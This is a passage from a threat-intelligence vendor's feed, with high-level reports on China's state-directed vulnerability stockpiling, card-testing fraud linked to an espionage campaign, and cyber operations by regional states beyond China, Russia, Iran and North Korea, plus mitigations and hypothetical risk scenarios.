          <li><strong>Incentivizing Compliance</strong></li>
        </ul>
        <p>This legal framework is reinforced through financial and professional incentives. The <a href="https://www.cnnvd.org.cn/">China National Vulnerability Database of Information Security</a> (CNNVD), managed by the Ministry of State Security (MSS), <a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">offers</a> researchers and firms monetary rewards, certificates, honorary titles, and preferential access to government contracts. This system encourages compliance by making vulnerability disclosure both mandatory and materially rewarding.</p>
        <ul>
          <li><strong>Talent Development and Recruitment Pipelines</strong></li>
        </ul>
        <p>China combines strict regulations with a well-organized system for developing cybersecurity talent. Competitions such as the Tianfu Cup, Matrix Cup, and QiangWang Cup serve as key recruitment and training platforms for the state’s cyber programs. The 2024 Matrix Cup’s <a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">$2.75 million USD</a> prize pool, nearly twice that of Canada’s Pwn2Own, highlights the size of this investment.</p>
        <ul>
          <li><strong>Private Sector Relationships</strong><br /><br />China’s private sector also plays a <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/crash-exploit-and-burn/#conclusion">pivotal role</a>. Major firms such as Qi An Xin, Huawei, Qihoo 360, and NSFocus contribute vulnerabilities and technical expertise directly to the government. Large technology companies also fund or subcontract offensive work to smaller firms, creating a dense ecosystem of start-ups engaged in exploit research and hacking services. The <a href="https://www.recordedfuture.com/ko/research/attributing-i-soon-private-contractor-linked-chinese-state-sponsored-groups">i-SOON leaks</a> (2023) revealed the scale and interconnectedness of this ecosystem: The company sold hack-for-hire services and targeting platforms to government customers while subcontracting work for Qi An Xin and Chengdu 404.</li>
        </ul>
        <h3>From Discovery to Deployment: Operationalizing China’s Vulnerability Pipeline</h3>
        <p>This centralized vulnerability ecosystem is producing <a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">measurable results</a>, enabling Chinese state-sponsored groups to convert vulnerability discovery into operational access at a speed and scale far beyond that seen in other national programs. A clear manifestation of this is their sustained focus on enterprise and edge technologies, including Fortinet, VMware/ESXi, and Ivanti, where access is durable and often high-privileged, and detection is limited. In 2025, China-linked groups exploited <a href="https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day">Ivanti VPN</a> and Trimble Cityworks (<a href="https://www.recordedfuture.com/ko/blog/trimble-cityworks-cve-2025-0994-vulnerability-analysis">1</a>, <a href="https://therecord.media/hackers-exploiting-trimble-cityworks-bug-used-by-local-govs">2</a>) flaws as part of a long-term strategy to remain undetected within networks, expand access, and position themselves for potential critical infrastructure disruption.</p>
        <p>China continues to expand its network of CNNVD technical support units (TSUs) and related programs, increasing its overall research base. TSUs are specialized organizations, often universities, state-linked labs, and cybersecurity firms that directly feed vulnerability research and intelligence into the national system. Since 2021, the number of TSUs has increased significantly, broadening the state’s research capacity and deepening its ability to identify and operationalize software flaws at scale.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_13e7963e118803f4d4991324bfaa7fc0ddd6019fc.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="900" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Number of new CNNVD TSUs by month, June 2021 to July 2025</em> <em>(Source:</em> <em><a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">Natto Thoughts</a>)</em></div>
          </div>
        </div>
        <p>Most vulnerability disclosures to affected vendors and the broader security community still originate from universities, labs, and cybersecurity firms associated with CNNVD, CNVD, and the expanding TSU network. However, even as the ecosystem grows, the overall volume of these disclosures continues to <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/sleight-of-hand-how-china-weaponizes-software-vulnerability/?utm_source=chatgpt.com">decline</a>, indicating that a larger share of discoveries is now being routed <a href="https://www.recordedfuture.com/ko/blog/chinese-mss-vulnerability-influence">internally</a> rather than published. This suggests that more vulnerabilities are being withheld for state-directed use. Secrecy surrounding hacking competitions is also growing: The Tianfu Cup was not held publicly in 2024, and the 2024 Matrix Cup shared little to <a href="https://nattothoughts.substack.com/p/the-matrix-cup-cultivating-top-hacking">no details</a> about discovered exploits. These competitions have historically been major sources of high-quality vulnerabilities, and reduced transparency further aligns with the shift away from open disclosure.<br /><br />Together, these trends — the rapid expansion of TSUs, the decline in public vulnerability reporting, and the tightening secrecy around exploit-generation events — likely point to a deliberate state strategy that emphasizes centralized stockpiling and selective operational use of vulnerabilities rather than public disclosure.</p>
        <p><strong>Strategic Stockpiling and Selective Use</strong></p>
        <p>China’s <a href="https://cloud.google.com/blog/topics/threat-intelligence/2023-zero-day-trends">reported</a> use of zero-days declined from twelve in 2023 to five in 2024, and it is responsible for only ten of the 104 zero-day exploits identified globally so far in 2025. While this may partly reflect limited visibility into zero-day deployment and attribution, the trend may also suggest a more selective, strategic approach to when and how its zero-day capabilities are used.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_13d3e1d5ebec066cdcdff5beca720487d65e8ef26.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="816" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Of the 104 zero-days identified in 2025, ten were attributed to Chinese state-sponsored threat actors (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Beijing’s control mechanisms under the RMSV and DSL enable it to selectively weaponize or withhold zero-days, preserving its most impactful capabilities for crises or strategic objectives. At the same time, n-day vulnerabilities — older but still unpatched flaws — remain highly effective due to inconsistent global patching.</p>
        <p>Using these known flaws allows Chinese operators to gain access to networks and gather intelligence without revealing their zero-day exploits. Overall, this reflects a system designed for long-term preparedness rather than immediate gain.</p>
        <p><strong>Military Integration and Strategic Significance</strong></p>
        <p>China’s April 2024 military reforms <a href="https://ndupress.ndu.edu/Media/News/News-Article-View/Article/4157257/a-new-step-in-chinas-military-reform/">introduced</a> three new divisions within the People’s Liberation Army (PLA), including two centered on cyber and information security:</p>
        <ul>
          <li>The Information Support Force (ISF), which is <a href="https://jamestown.org/program/a-disturbance-in-the-force-the-reorganization-of-peoples-liberation-army-command-and-elimination-of-chinas-strategic-support-force/">responsible</a> for the security and continuity of China’s military networks, data systems, and command infrastructure</li>
          <li>The Cyberspace Force (CSF), which is <a href="https://www.iiss.org/online-analysis/online-analysis/2024/05/chinas-new-information-support-force/">dedicated</a> to both offensive and defensive cyber operations</li>
        </ul>
        <p>Together, the two units consolidate China’s cyber and information capabilities, which were previously primarily nested under the PLA Strategic Support Force. These units form the backbone of its digital warfighting structure. The restructuring is likely to enhance Beijing’s ability to coordinate kinetic and cyber operations, with zero-days serving as key enablers and potential first-strike tools.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1e37fc1772617d06c2746e0f6deba2a514f7ffd2b.png?width=750&amp;format=png&amp;optimize=medium" width="1249" height="512" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>New structure of the People’s Liberation Army (PLA) (Source:</em> <em><a href="https://jamestown.org/wp-content/uploads/2024/04/CB-V-24-Issue-9-April-26.pdf">The Jamestown Foundation</a>)</em></div>
          </div>
        </div>
        <p>The future use of zero-days will depend on how China decides to pursue its geostrategic goals, such as <a href="https://www.recordedfuture.com/ko/research/from-coercion-to-invasion-the-theory-and-execution-of-china-cyber-activity">future unification</a> with Taiwan. However, by compromising critical networks in advance, China can secure persistent access and deploy disruptive cyber effects alongside kinetic operations, as seen in Russia’s <a href="https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine-early-lessons-from-the-cyber-war/">coordinated</a> cyber-military campaigns in Ukraine. Chinese state-sponsored <a href="https://app.recordedfuture.com/portal/intelligence-card/rWxgd_/overview">Volt Typhoon</a> activity has been widely assessed as fulfilling such a purpose.</p>
        <h2>Outlook</h2>
        <ul>
          <li><strong>Increased Willingness to Use Zero-Days:</strong> As China reduces its reliance on US technology through its “<a href="https://www.wsj.com/world/china/china-technology-software-delete-america-2b8ea89f?gaa_at=eafs&amp;gaa_n=AWEtsqePdzH3SRky1gFGa5OK6eLRoL78W2-ChzKYqbYaN8iUdsXKWF60d69fkSz8XTs%3D&amp;gaa_ts=68f7a71d&amp;gaa_sig=afo7Dvij1rhGpclsWz_RcXPU0MRK8PaKKNGOTG0Hj8LOLI9vBlFGl8iwGOQq2yx1FCUqK89rZf_PDBlddaDQvg%3D%3D">Delete America</a>” campaign, the cost of exploiting Western software will decrease, making zero-day use more attractive in future conflicts over the long term.</li>
          <li><strong>Expanded Pre-Positioning:</strong> Expect continued infiltration of critical infrastructure and enterprise systems through both n-day and zero-day exploits to ensure durable wartime access.</li>
          <li><strong>Increased N-day Use:</strong> The rapid adoption of AI-assisted coding and automation is accelerating the accumulation of software vulnerabilities. This expanding security debt — the accumulation of unpatched and unreviewed vulnerabilities — will give adversaries, including China, a broader and more persistent pool of n-day exploits to weaponize.</li>
          <li><strong>Evolving Contractor Ecosystem:</strong> State-aligned private firms are likely to accelerate automation and AI-assisted vulnerability discovery, thereby expanding the Chinese state’s operational stockpile of viable exploits.</li>
          <li></li>
        </ul>
        <h2>Mitigations</h2>
        <ul>
          <li><strong>Adopt an “Assume Breach” Posture:</strong> Implement zero-trust architectures that enforce identity and device verification at every access point. Use <a href="http://recordedfuture.com/products/threat-intelligence">Recorded Future® Threat Intelligence</a> to monitor for China-nexus infrastructure and malicious activity, feeding enriched indicators directly into security information and event management (SIEM) and security orchestration, automation, and response (SOAR) workflows.</li>
          <li><strong>Prioritize Edge and Enterprise Patching:</strong> Focus remediation efforts on virtual private networks (VPNs), firewalls, hypervisors, and identity platforms most commonly targeted by China-nexus threat actors. Use <a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Recorded Future Vulnerability Intelligence</a> to track emerging zero-day and n-day threats, prioritize patching by exploitation risk, and validate remediation across critical systems.</li>
          <li><strong>Detect Post-Exploitation Behavior:</strong> Use D3FEND mappings such as Process Access Pattern Analysis (D3-PAPA) and Remote Access Detection (D3-RAD) to identify stealthy follow-on actions. Combine these controls with <a href="https://www.recordedfuture.com/ko/products/attack-surface-intelligence">Recorded Future Attack Surface Intelligence</a> to identify exposed assets and verify that detection coverage extends to externally facing environments.</li>
          <li><strong>Secure Identities and Access:</strong> Leverage <a href="https://www.recordedfuture.com/ko/products/identity-intelligence">Recorded Future Identity Intelligence</a> to detect compromised credentials that may complement exploit-based intrusions.</li>
        </ul>
        <h2>Risk Scenario</h2>
        <p><em>EnerTech Global</em>, a European energy technology firm providing control systems and smart grid software to multiple NATO-aligned countries, becomes the target of a Chinese state-sponsored cyber campaign. Using undisclosed zero-day vulnerabilities, Chinese operators infiltrate EnerTech’s production and customer environments to gather intelligence, manipulate software updates, and pre-position for potential disruption.</p>
        <h3>First-Order Implications</h3>
        <p>Chinese threat actors exploit a zero-day in a network management or VPN appliance to gain initial access to EnerTech’s internal systems and engineering networks.</p>
        <p>A zero-day in industrial control or software build pipelines is used to insert malicious code into firmware updates distributed to downstream customers.</p>
        <h4>Organizational Risks:</h4>
        <ul>
          <li><strong>Operational:</strong> Compromise of development and production networks halts manufacturing and disrupts customer support operations.</li>
          <li><strong>Legal:</strong> Breach of export-control and cybersecurity regulations triggers EU and US compliance investigations.</li>
          <li><strong>Brand:</strong> Public confirmation of a “state-backed breach” undermines trust with government and defense customers dependent on EnerTech’s technology.</li>
        </ul>
        <h3>Second-Order Implications</h3>
        <p>Attackers use stolen code-signing certificates to distribute trojanized software updates to energy utilities across Europe. Collected intelligence on grid infrastructure is used to map potential disruption points for future contingency operations.</p>
        <h4>Organizational Risks:</h4>
        <ul>
          <li><strong>Operational:</strong> Some utilities begin to see irregularities in their operational technology (OT) environments, including unexpected behavior in grid-monitoring tools, delayed telemetry updates, and unexplained authentication failures on systems that rely on EnerTech software.</li>
          <li><strong>Brand:</strong> EnerTech’s reputation deteriorates as customers and regulators question its software assurance and supply chain controls.</li>
          <li><strong>Legal:</strong> Disclosure of tampered software triggers international incident response coordination and potential export-license suspension.</li>
        </ul>
        <h3>Third-Order Implications</h3>
        <p>Persistent access enables China to remotely sabotage or disable systems during a geopolitical crisis, thereby amplifying disruption across allied power grids. Stolen intellectual property is used by Chinese competitors to replicate EnerTech’s industrial software, undercutting global market bids.</p>
        <h4>Organizational Risks:</h4>
        <ul>
          <li><strong>Competitive:</strong> Loss of proprietary code and technology enables China-based competitors to dominate regional procurement markets.</li>
          <li><strong>Brand:</strong> Association with a high-profile critical infrastructure breach erodes long-term credibility in both commercial and government sectors.</li>
          <li><strong>Legal:</strong> Multinational investigations and sanctions create enduring compliance exposure and financial penalties.</li>
        </ul>
        <h2>Further Reading</h2>
        <ul>
          <li><a href="https://www.recordedfuture.com/ko/research/redecho-targeting-indian-power-sector">China-linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions</a></li>
          <li><a href="https://www.recordedfuture.com/ko/research/continued-targeting-of-indian-power-grid-assets">Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group</a></li>
          <li><a href="https://www.recordedfuture.com/ko/research/from-coercion-to-invasion-the-theory-and-execution-of-china-cyber-activity">From Coercion to Invasion: The Theory and Execution of China’s Cyber Activity in Cross-Strait Relations</a></li>
          <li><a href="https://www.recordedfuture.com/ko/blog/chinese-mss-vulnerability-influence">China’s Ministry of State Security Likely Influences National Network Vulnerability Publications</a></li>
          <li><a href="https://www.iiss.org/online-analysis/online-analysis/2024/05/chinas-new-information-support-force/">China’s new Information Support Force</a></li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_103d01df10dae3a07a40c46523f00a6b54d5aa865.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The $0 Transaction That Signaled a Nation-State Cyberattack]]></title>
            <link>https://www.recordedfuture.com/ko/blog/transaction-that-signaled-nation-state-cyberattack</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/transaction-that-signaled-nation-state-cyberattack</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[A $0 card test signaled a Chinese state-linked cyberattack on Anthropic’s AI platform. Learn how card-testing fraud intelligence spots nation-state ops early.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Points:</h2>
              <ul>
                <li>Fraud enables cyber operations: Threat actors used compromised payment cards validated through Chinese-operated card-testing services to attempt unauthorized access to Anthropic's AI platform during a reported state-sponsored espionage campaign.</li>
                <li><a href="https://www.recordedfuture.com/ko/products/payment-fraud-intelligence">Card testing</a> signals downstream attacks: The observed fraud followed a predictable kill chain—compromise, validation, resale, and attempted cashout—providing early warning <a href="https://www.recordedfuture.com/ko/threat-intelligence-101/intelligence-sources-collection/threat-intelligence-feeds">indicators</a> that preceded the final malicious transaction.</li>
                <li>Recorded Future’s take: Proactive fraud intelligence prevents broader threats. Tester merchant intelligence can identify compromised cards before they're used for high-value fraud or to support advanced threat actor operations.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1b69b3987107eb35b9673377e1cac520995d23f77.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Cyber on the Geopolitical, Battlefield: Beyond the, “Big Fourˮ]]></title>
            <link>https://www.recordedfuture.com/ko/research/cyber-geopolitical-battlefield</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/cyber-geopolitical-battlefield</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Offensive cyber operations are spreading beyond the Big Four. Discover how regional conflicts are driving new state-linked cyber threats.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Regional conflicts and weakened international institutions are driving the use of offensive cyber operations beyond the “Big Four” (China, Russia, Iran, and North Korea). Monitoring these threat actors requires organizations to <strong>proactively assess their geopolitical risk</strong> to understand where future threats are most likely to emerge.</p>
        <p>In 2025, Recorded Future identified at least <strong>twenty actors across thirteen “non-Big Four” countries</strong> conducting cyber operations, primarily linked to regional conflicts, domestic surveillance, or foreign espionage.</p>
        <p>Companies should closely monitor regional geopolitics and <strong>maintain strong continuity and resilience plans</strong> to protect against cyber espionage or disruptive cyberattacks.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18967900e841d62eae716d18a4b04dcc4ae65efcb.png?width=750&amp;format=png&amp;optimize=medium" width="1194" height="668" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Trends influencing how and why state-sponsored actors beyond China, Russia, Iran, and North Korea carry out cyber operations (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Analysis</h2>
        <h3><em>Overview of Other State Sponsors of Cyber Operations</em></h3>
        <p>While the “Big Four” account for the majority of reported cyber threat activity, many other countries use cyber operations to advance their strategic interests. Recorded Future data shows that most observed activity outside of the “Big Four” stems from regional conflicts. Patriotic hacktivist groups, which advance state interests alongside state-sponsored espionage operations, represent the highest volume of reported activity. The degree of coordination between hacktivists and the government remains unclear and likely <a href="https://www.atlanticcouncil.org/wp-content/uploads/2012/02/022212_ACUS_NatlResponsibilityCyber.PDF">varies</a>. However, their actions are included in this assessment because of their close alignment with state objectives, which means their activity correlates with interstate conflict risk.</p>
        <p>Outside of active conflict, espionage against foreign and domestic targets continues to be a major driver of cyber operations. The most <a href="https://www.iiss.org/globalassets/media-library---content--migration/files/research-papers/cyber-power-report/cyber-capabilities-and-national-power---a-net-assessment___.pdf">cyber-capable</a> states invest heavily in avoiding detection and attribution, given the significant <a href="https://europe.unc.edu/wp-content/uploads/sites/314/2016/11/Brief_NSA_Leaks_Transatlantic_Relations_2014.pdf">negative</a> political consequences of exposure.</p>
        <p>Tracking threat actors beyond the Big Four requires organizations to understand their geopolitical risk in order to anticipate where threats are most likely to emerge. Operating in certain regions or conflict zones likely increases the risk of cyber espionage or destructive attacks.</p>
        <h3><em>Regional Cyber Conflicts</em></h3>
        <p>Territorial disputes drove nearly two-thirds of observed cyber activity in 2025, according to Recorded Future data. Cyber operations focused on intelligence collection against government, defense, and other critical infrastructure. Hacktivists escalated their activity during conflicts, carrying out nuisance-level attacks amplified through influence operations. Like hacktivists, influence operations align closely with state interests during conflict, but have varying degrees of connection to the state. These activities rarely affect battlefield outcomes but are designed to signal technical sophistication or moral superiority over the adversary.</p>
        <h4>India and Pakistan</h4>
        <p>Between May 7 and 10, 2025, India and Pakistan <a href="https://www.stimson.org/2025/four-days-in-may-the-india-pakistan-crisis-of-2025/">exchanged</a> a series of missile strikes — the most serious escalation between the two nuclear-armed countries in decades. Throughout the crisis, large volunteer hacktivist communities on both sides conducted disruptive attacks, <a href="https://www.rusi.org/explore-our-research/publications/commentary/operation-sindoor-and-india-pakistans-escalated-rivalry-cyberspace">primarily</a> DDoS and website defacements. Pakistan-linked APT36 <a href="https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/">conducted</a> espionage operations <a href="https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html">targeting</a> the Indian government and other politically motivated targets, while threat actors linked to the Indian government, such as SideWinder, pursued Pakistani <a href="https://www.acronis.com/en/tru/posts/from-banks-to-battalions-sidewinders-attacks-on-south-asias-public-sector/">military</a> targets.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a9881b0bdbc5c31c2a924c1974d48e4684a87fe0.png?width=750&amp;format=png&amp;optimize=medium" width="1140" height="628" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Cyber activity between India and Pakistan spiked alongside the outbreak of armed conflict in May 2025 (Source:</em> <em><a href="https://www.recordedfuture.com/ko/research/influence-operations-and-conflict-escalation-in-south-asia">Recorded Future</a>)</em></div>
          </div>
        </div>
        <p>Influence operations intended to shape perceptions of the conflict also <a href="https://www.recordedfuture.com/ko/research/influence-operations-and-conflict-escalation-in-south-asia">intensified</a>. Influence networks amplified hacktivist claims, often overstating their impact, such as <a href="https://www.hindustantimes.com/trending/pib-debunks-claim-that-pakistani-hackers-crippled-70-of-india-s-power-grid-101747134385434.html">widespread reporting</a> on Pakistani social media that hackers had shut down 70% of India’s electric grid. These operations are intended to portray their own side as more capable and their adversary as vulnerable, underscoring the importance of narrative control in conjunction with military operations.</p>
        <h4>Thailand and Cambodia</h4>
        <p>Similar to cyber engagements observed between India and Pakistan, hacktivist operations bolstered by influence campaigns <a href="https://moderndiplomacy.eu/2025/07/21/cyber-clashes-between-cambodia-and-thailand-threaten-asean-stability/">significantly escalated</a> between Thai hackers and Cambodian hackers following the <a href="https://www.politico.com/news/2025/07/23/thai-and-cambodian-soldiers-fire-at-each-other-in-disputed-border-area-00473426">May 2025</a> conflict. These were largely carried out by self-proclaimed patriotic hacktivist groups. Operations included DDoS attacks, website defacements, and data leak operations. More targeted <a href="https://www.cnn.com/2025/07/01/asia/thailand-pm-paetongtarn-suspended-intl-hnk">hack-</a><a href="https://www.bangkokpost.com/thailand/general/3083900/cyber-cops-send-leaked-hun-sen-audio-file-to-oag">and-leak</a> operations were also intended to reveal politically damaging information about the other country’s leadership. Influence operation narratives emphasized that the opposing side was the aggressor in the conflict, likely in order to garner both domestic and international support.</p>
        <h4>Morocco and Algeria</h4>
        <p>While <a href="https://www.cyfirma.com/research/explainer-the-algeria-morocco-tensions/">tensions</a> between Morocco and Algeria have not escalated into armed conflict, cyber hostilities increased significantly in 2025. In the context of these tensions, pro-Algerian hacktivists have allegedly carried out a series of high-profile attacks on Moroccan institutions, <a href="https://therecord.media/morocco-investigates-breach-hackers-algeria">striking</a> the National Social Security Fund, the <a href="https://cybelangel.com/blog/ancfcc-data-leak-flash-report/">National Agency for Land Conservation</a>, and the <a href="https://www.moroccoworldnews.com/2025/06/210448/algerias-jabaroot-targets-justice-ministry-in-latest-cyberattack-on-moroccan-institutions/">Ministry of Justice</a>. The hackers, going by JabaROOT, leaked personal and financial data of millions of Moroccan citizens, potentially exacerbating existing domestic tensions over income disparity. The cyberattacks may have been intended to demonstrate Moroccan vulnerability while maintaining a level of deniability for the Algerian government. Moroccan hacktivists responded with <a href="https://izoologic.com/region/africa/morocco-data-breach-sparks-wave-of-cyber-retaliations/">retaliatory data breaches</a> against the Algerian government and education institutions.</p>
        <h3><em>Espionage Operations Outside of Armed Conflict</em></h3>
        <p>While many more countries almost certainly engage in cyber espionage, the following threat actors have been tracked attempting to collect information on targets of political significance:</p>
        <ul>
          <li>While <strong>India-linked</strong> threat actors such as <a href="https://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/">SideWinder</a> and <a href="https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one">Bitter</a> have traditionally targeted neighbors like Pakistan, Sri Lanka, and Bangladesh, espionage against European diplomatic entities <a href="https://www.enisa.europa.eu/sites/default/files/2025-10/ENISA%20Threat%20Landscape%202025.pdf">increased</a> significantly in 2024, demonstrating a broader targeting scope.</li>
          <li><strong>Vietnam</strong> has <a href="https://www.aspeninstitute.org/publications/the-rise-of-the-rest-maturing-cyber-threats-beyond-the-big-four/">accelerated</a> its development of cyber capabilities. APT32, likely linked to the Vietnamese government, has carried out <a href="https://gbhackers.com/apt32-hacker-group-poisoning-github/">operations</a> against Chinese cybersecurity researchers as well as against internal <a href="https://thehackernews.com/2024/08/vietnamese-human-rights-group-targeted.html">dissidents</a>. In the past, this group has also targeted <a href="https://cyberscoop.com/apt32-ocean-lotus-vietnam-car-companies-hacked/">car manufacturers</a>, <a href="https://www.recordedfuture.com/ko/research/apt32-malware-campaign">foreign governments</a>, and others, driven by geopolitical and economic priorities.</li>
          <li>At least two threat actor groups observed conducting espionage operations have been linked to <strong>Türkiye</strong>: <a href="https://www.microsoft.com/en-us/security/blog/2025/05/12/marbled-dust-leverages-zero-day-in-output-messenger-for-regional-espionage/">Marbled Dust</a> and <a href="https://cyberscoop.com/strongpity-apt-alien-labs-turkey/">StrongPity</a>, who prioritize regional and domestic targets. In addition, a <a href="https://assets.recordedfuture.com/insikt-report-pdfs/2023/cta-2023-0112.pdf">robust online community</a> of patriotic hacktivists targets regional and international adversaries, whether historical (such as Armenia and Greece) or in modern disputes (France and Germany).</li>
          <li>Stealth Falcon, <a href="https://attack.mitre.org/groups/G0038/">linked</a> to the <strong>United Arab Emirates</strong>, has been <a href="https://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/">observed</a> exploiting a zero-day vulnerability to target a Turkish defense organization. The group has been active since at least 2016, targeting government and defense organizations primarily in the Middle East and Africa.</li>
        </ul>
        <p>Political and diplomatic priorities make intelligence targets predictable. Organizations should assess not only their regional exposure but also whether their industry aligns with strategic priorities, as sectors tied to national strategy are the most likely targets for espionage.</p>
        <h3><em>Domestic Surveillance Activity</em></h3>
        <p>Many states use their cyber capabilities to monitor domestic security concerns, which can include law enforcement or national security priorities, monitoring political opposition, or conducting economic espionage on behalf of a key national industry. Domestic surveillance capabilities are often supplemented with commercial off-the-shelf spyware, such as Intellexa’s <a href="https://www.recordedfuture.com/ko/research/intellexas-global-corporate-web">Predator</a> or Candiru’s <a href="https://www.recordedfuture.com/ko/research/tracking-candirus-devilstongue-spyware">DevilsTongue</a>. Similar to understanding political priorities for cross-border espionage, companies should assess whether they possess data that may be of political significance to the government of a country in which they operate. States that lack sufficient oversight or legal privacy protections <a href="https://substack.com/inbox/post/180401534?r=3g10gt&amp;utm_medium=ios&amp;triedRedirect=true">pose an increased risk</a> of intrusive cyber monitoring and surveillance.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1266d09a14347a2b84e82e385594f3abfe78022ec.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="835" />
            </div>
          </div>
          <div>
            <div>
              <p><em><strong>Figure 3:</strong></em> <em>(Left) Graphical representation from the Insikt Group report titled Dark Covenant of the direct and indirect links between Russian Intelligence Services and individuals in the Russian cybercriminal underground; (Right) Infographic of reported cyberattack by Russian state-backed ransomware operators against German military contractors</em></p>
              <p><em>(Source: Recorded Future)</em></p>
            </div>
          </div>
        </div>
        <h2>Outlook</h2>
        <ul>
          <li><strong>Cyberattacks are likely to increase as international alliances weaken</strong>: The Thailand-Cambodia and India-Pakistan conflicts demonstrate an increased willingness to use force to pursue regional goals. Deployments in multilateral peacekeeping operations <a href="https://www.sipri.org/media/press-release/2025/peace-operation-deployments-fall-40-per-cent">decreased by 40%</a> over the last decade, likely due to challenges in generating the necessary support for intervention. This makes it more likely that states will turn to violence to resolve disputes, as opposed to non-violent negotiations. Cyber and influence operations are becoming increasingly common features in these conflicts, serving as a low-cost means of signaling strength, shaping narratives, and imposing limited disruption.</li>
          <li><strong>Cyber capability build-up may follow conventional military build-up:</strong> NATO countries in <a href="https://www.voanews.com/a/billion-rearmament-plan-fuels-european-defense-stocks/8002455.html">Europe</a>, as well as South Korea and <a href="https://apnews.com/article/japan-military-budget-us-australia-china-f82c70bd6f5cbfc184f15cf17f2fde21">Japan</a>, are increasing their military spending. While many of these countries already have advanced cyber capabilities, they may seek to invest in more sophisticated offensive capabilities to augment conventional forces. Legal and doctrinal changes, such as in <a href="https://therecord.media/japan-enacts-new-law-allowing-offensive-cyber-operations">Japan</a> and <a href="https://www.csis.org/blogs/strategic-technologies-blog/south-koreas-2024-cyber-strategy-primer">South Korea</a>, are also laying the groundwork for a shift from a defensive cyber policy to an offensive posture.</li>
          <li><strong>Commercial cyber capabilities may be sought for interstate conflict:</strong> Countries seeking to gain a cyber advantage in advance of a regional conflict may turn to commercial offensive tools, similar to the <a href="https://therecord.media/spyware-purchased-by-eighty-countries-gchq-warns">growing reliance</a> on these tools for internal law enforcement or counterterrorism operations. This reduces the barrier to entry for smaller or less technically mature states, enabling more actors to conduct sophisticated intrusions, targeted espionage, and high-impact disruption.</li>
        </ul>
        <h2>Mitigations</h2>
        <ul>
          <li>Use Recorded Future’s <a href="https://www.recordedfuture.com/ko/products/geopolitical-intelligence">Geopolitical Intelligence</a> to monitor regional conflicts and geopolitical developments for risks to international and outsourced operations.</li>
          <li>Use Recorded Future’s <a href="https://www.recordedfuture.com/ko/products/threat-intelligence">Threat Intelligence</a> to track threat actor groups and detect TTPs associated with non-Big Four countries.</li>
          <li>Understand the risk of surveillance for personnel traveling to high-risk countries and take mitigating actions such as using alternative devices. Use Recorded Future’s Country Risk Data in the <a href="https://www.recordedfuture.com/ko/products/geopolitical-intelligence">Geopolitical Intelligence</a> module to assess surveillance and other travel risks.</li>
          <li>Ensure continuity-of-operations plans are in place to mitigate the impacts of disruptive or destructive attacks. Use Recorded Future <a href="https://www.recordedfuture.com/ko/services/analyst-on-demand">Analyst-on-Demand</a> for bespoke research on how your organization might be targeted.</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1cdc94730e147e8664f08d34340f7be84e08d6510.png?width=750&amp;format=png&amp;optimize=medium" width="1304" height="724" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>Starting with these four questions can help you understand threat actors’ motivations for targeting your organization (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Risk Scenario</h2>
        <p><em>A longstanding territorial dispute between Country A and Country B erupts into a military skirmish at the border, with risks of further escalation. Country A is home to a robust business process outsourcing industry serving some of the world’s largest international corporations.</em></p>
        <h3>First-Order Implications</h3>
